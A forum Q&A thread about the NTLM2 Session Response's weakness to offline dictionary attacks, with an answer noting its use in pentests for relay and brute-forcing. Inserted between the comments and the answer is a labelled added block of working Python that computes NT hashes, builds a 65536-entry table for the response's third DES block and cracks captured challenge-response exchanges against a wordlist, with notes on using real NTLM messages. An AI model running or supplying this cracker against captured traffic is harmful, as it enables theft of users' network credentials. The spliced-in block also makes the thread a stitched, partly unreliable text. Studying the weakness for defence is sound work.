
I've been looking at the NTLM2 Session Response which is apparently supported transparently by commonly used browsers. NOTE: This is not to be confused with full NTLMv2 authentication. This in-depth and detailed explanation describes the core process.

The upshot: this scheme is known to be subject to offline dictionary attacks as discussed in this presentation from 2004. One of the main issues is that it creates an MD4 hash of two bytes which means you can compute the 65536 possible results for that part of the response for any given challenge and client nonce and rule out (generally) 65535 out of 65536 passwords by doing just the MD4 hash.

What I find really surprising is that Chrome is 'willing' to engage in this scheme (IE: not surprised). Disabling this option on a given server is manageable, but that doesn't prevent people from setting up simple web pages that will silently negotiate with the browser to send the insecure response. Am I wrong to think it's irresponsible to make this the default behavior? Shouldn't this be opt-in given the risks and how esoteric this is?

On a side note, if anyone has any reference on what rate of MD4 generation is achievable, please respond. I can find things for MD5 but I believe MD4 is easier.

JimmyJames
  • It's not esoteric. It's not well supported by web browsers, and other software doesn't support it at all. It's the most common nightmare of corporate networks. The thing is that it is basically used on web proxies with Active Directory. It's used in corporate LANs to authenticate users to access the internet. Like a password on a proxy. Regarding authentication on websites, nobody is really using it except for some LAN applications. – Aria Sep 22 '16 at 21:58
  • @Aria "nobody is really using it except for some LAN applications" Can you provide some evidence of this? I think you are probably right. I have seen it in use on internal networks. That's still an issue. Perimeter security is a joke. – JimmyJames Sep 23 '16 at 13:48
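The response the question is about, as a worked example added here (it is not code from the original question, its answer, or any browser or server project). The 16-bit part the question refers to is the third 8-byte DES block of the NTLM2 Session Response: the 16-byte MD4 (NT) hash of the password is padded to 21 bytes and cut into three 7-byte DES keys, so the third key holds only hash bytes 14 and 15 plus five zero bytes. For a captured server challenge and client nonce an attacker can therefore precompute all 65536 possible third blocks, and then reject almost every candidate password with one MD4 and no DES work. Python is used so the MD4 can be shown in full (hashlib's md4 is frequently disabled under OpenSSL 3). Assumptions: the message layout follows the public NTLM documentation; DES comes from pycryptodome if it is installed, otherwise a clearly labelled stand-in keyed PRF with the same 8-byte-in/8-byte-out shape is substituted so the filtering logic still runs; the challenge, nonce and wordlist are constructed for the demo.

```python
# Added example (not from the original post). ASSUMPTIONS: NTLM2 Session Response
# layout per the public NTLM docs; DES from pycryptodome if present, otherwise a
# labelled stand-in keyed PRF; challenge, nonce and wordlist are constructed here.
import hashlib
import struct

try:
    from Crypto.Cipher import DES as _DES          # pycryptodome, if installed

    def des_block(key8: bytes, block8: bytes) -> bytes:
        return _DES.new(key8, _DES.MODE_ECB).encrypt(block8)
    USING_REAL_DES = True
except ImportError:                                # stand-in (ASSUMPTION): keyed PRF, same shape as DES
    def des_block(key8: bytes, block8: bytes) -> bytes:
        return hashlib.sha256(key8 + block8).digest()[:8]
    USING_REAL_DES = False


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4 in pure Python (hashlib's md4 is often unavailable under OpenSSL 3)."""
    def rot(x, n):
        return ((x << n) | (x >> (32 - n))) & 0xFFFFFFFF
    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    h = lambda x, y, z: x ^ y ^ z
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64) + struct.pack("<Q", 8 * len(data))
    a0, b0, c0, d0 = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    r2 = [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15]
    r3 = [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15]
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = a0, b0, c0, d0
        for i in range(16):   # round 1
            a, b, c, d = d, rot((a + f(b, c, d) + x[i]) & 0xFFFFFFFF, (3, 7, 11, 19)[i % 4]), b, c
        for i in range(16):   # round 2
            a, b, c, d = d, rot((a + g(b, c, d) + x[r2[i]] + 0x5A827999) & 0xFFFFFFFF, (3, 5, 9, 13)[i % 4]), b, c
        for i in range(16):   # round 3
            a, b, c, d = d, rot((a + h(b, c, d) + x[r3[i]] + 0x6ED9EBA1) & 0xFFFFFFFF, (3, 9, 11, 15)[i % 4]), b, c
        a0, b0 = (a0 + a) & 0xFFFFFFFF, (b0 + b) & 0xFFFFFFFF
        c0, d0 = (c0 + c) & 0xFFFFFFFF, (d0 + d) & 0xFFFFFFFF
    return struct.pack("<4I", a0, b0, c0, d0)


def nt_hash(password: str) -> bytes:
    """NT hash = MD4 of the UTF-16LE password; this is what the response is keyed with."""
    return md4(password.encode("utf-16-le"))


def des_key_from_7(k7: bytes) -> bytes:
    """Spread 56 key bits over 8 bytes, low bit of each byte carrying odd parity."""
    bits = int.from_bytes(k7, "big")
    out = bytearray()
    for i in range(8):
        seven = (bits >> (49 - 7 * i)) & 0x7F
        out.append((seven << 1) | (bin(seven).count("1") % 2 == 0))
    return bytes(out)


def session_hash(server_challenge: bytes, client_nonce: bytes) -> bytes:
    """NTLM2 session hash: first 8 bytes of MD5(server challenge || client nonce)."""
    return hashlib.md5(server_challenge + client_nonce).digest()[:8]


def ntlm2_session_response(password: str, server_challenge: bytes, client_nonce: bytes) -> bytes:
    """24-byte response: session hash encrypted under three 7-byte slices of the NT hash
    padded to 21 bytes. Slice 3 is hash[14:16] plus five zero bytes: only 16 unknown bits."""
    sh = session_hash(server_challenge, client_nonce)
    padded = nt_hash(password) + b"\x00" * 5
    return b"".join(des_block(des_key_from_7(padded[i:i + 7]), sh) for i in (0, 7, 14))


def block3_table(server_challenge: bytes, client_nonce: bytes) -> dict:
    """All 65536 possible third blocks for this challenge/nonce, mapped back to the two
    hash bytes that produce them. Built once per captured exchange."""
    sh = session_hash(server_challenge, client_nonce)
    table = {}
    for v in range(65536):
        tail = v.to_bytes(2, "big")
        table[des_block(des_key_from_7(tail + b"\x00" * 5), sh)] = tail
    return table


def recover_password(candidates, server_challenge, client_nonce, response, table=None):
    """Offline dictionary attack on a captured exchange. Returns (password or None, number
    of candidates that passed the 16-bit filter and needed the full three-DES check)."""
    table = table if table is not None else block3_table(server_challenge, client_nonce)
    wanted_tail = table.get(response[16:24])
    if wanted_tail is None:
        return None, 0
    survivors = 0
    for pw in candidates:
        if nt_hash(pw)[14:16] != wanted_tail:   # one MD4, no DES: ~65535/65536 rejected here
            continue
        survivors += 1
        if ntlm2_session_response(pw, server_challenge, client_nonce) == response:
            return pw, survivors
    return None, survivors


# Constructed sample exchange (not captured data): server challenge, client nonce, wordlist.
SERVER_CHALLENGE = bytes.fromhex("0123456789abcdef")
CLIENT_NONCE = bytes.fromhex("ffeeddccbbaa9988")
WORDLIST = ["Password1", "Welcome1", "Summer2016", "Winter2016!", "letmein", "changeme"]
CAPTURED = ntlm2_session_response("Winter2016!", SERVER_CHALLENGE, CLIENT_NONCE)

if __name__ == "__main__":
    pw, survivors = recover_password(WORDLIST, SERVER_CHALLENGE, CLIENT_NONCE, CAPTURED)
    print("real DES:", USING_REAL_DES, "| recovered:", pw, "| candidates past filter:", survivors)
```

On a real capture the server challenge comes from the Type 2 message and the client nonce and 24-byte response from the Type 3 message; the rest of the procedure is unchanged. The filtering ratio does not depend on which block cipher sits behind des_block, only on the fact that the third key has 16 unknown bits, which is why the stand-in still shows the same shape of attack when pycryptodome is absent.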

1 Answer

Sending your logged-in user credentials (SSO) is limited to the intranet zone. HTTP-based NTLM authentication is widely used inside corporate networks and is not considered a security risk unless an attacker has managed to get a foothold inside your network (which will happen).

By default the intranet zone is defined by anything that's in the same subnet as you, the same DNS suffix as you, local proxy exclusions or anything that you manually defined.

This is still a good attack vector to gain credentials, assuming you've managed to get into the corporate network, and I've used it many times when pentesting networks (for NTLM reflection/relay, or just to brute-force the password).

Jonathan Allon